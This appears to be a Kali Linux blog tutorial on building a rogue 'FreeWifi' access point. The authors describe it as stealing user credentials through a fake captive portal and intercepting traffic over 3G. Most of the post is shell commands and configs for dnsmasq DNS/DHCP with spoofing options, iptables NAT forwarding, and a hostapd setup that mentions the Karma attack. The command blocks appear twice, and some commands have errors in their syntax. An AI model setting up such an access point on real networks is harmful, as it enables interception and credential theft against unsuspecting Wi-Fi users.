#KaliLinux Evil #Wireless Access Point
A few days ago, we had the opportunity to deploy a rogue access point that would steal user credentials using a fake, captive web portal, and provide MITM’d Internet services via 3G. We needed reliability and scalability in our environment as there would potentially be a large amount of, erm….”participants” in this wireless network. We were pretty happy with the result and quickly realized that we had created a new “Kali Linux recipe”. Or in other words, we could create a custom, bootable wireless evil access point image, which could do all sorts of wondrous things.
Required Hardware
- We used a battery-powered Raspberry Pi for this project, however the instructions below will work on pretty much anything that can run Kali Linux and has 2 free USB ports – ARM and virtual environments included.
- A supported USB wireless adapter; we used an old Netgear WNA1000 we had lying around.
- A supported 3G modem; we found a TP-Link MA180 3.75G HSUPA USB Adapter in a local shop.
Simple Setup of DNS and DHCP
We ended up building our wireless access point using hostapd and dnsmasq using a relatively simple setup. We found that this gave the most reliable performance and was the easiest to configure. In addition, using dnsmasq allowed us to easily control spoofed DNS queries. We start by installing all our prerequisites:
apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
Once everything is installed, we configure dnsmasq to serve DHCP and DNS on the wireless interface and then start the dnsmasq service.
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service start dnsmasq
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service start dnsmasq
Setting up the 3G Connection
This part was surprisingly simple using the Gnome NetworkManager GUI interface. Adding a new 3G connection and going through the automated wizard got us online in a couple of minutes. Once connected, we saw our new ppp0 WAN interface, now providing us with Internet access. Alternatively, this setup can be performed at the command line using wvdial. Now that we have our WAN connection setup, let’s move on to setting up the wireless access point.
Setting up the Wireless Access Point
Setting up the access point is a breeze using hostapd. We configure an IP for the wireless interface, and configure iptables rules for NAT. Then we quickly configure the hostapd service to use our wireless interface to run an access point with the SSID “FreeWifi”. Once the service is started a wireless network called “FeeWifi” should show up. Anyone connecting to this network would be routed thorough our Kali box, out to the internet over 3g.
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service start hostapd
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service start hostapd
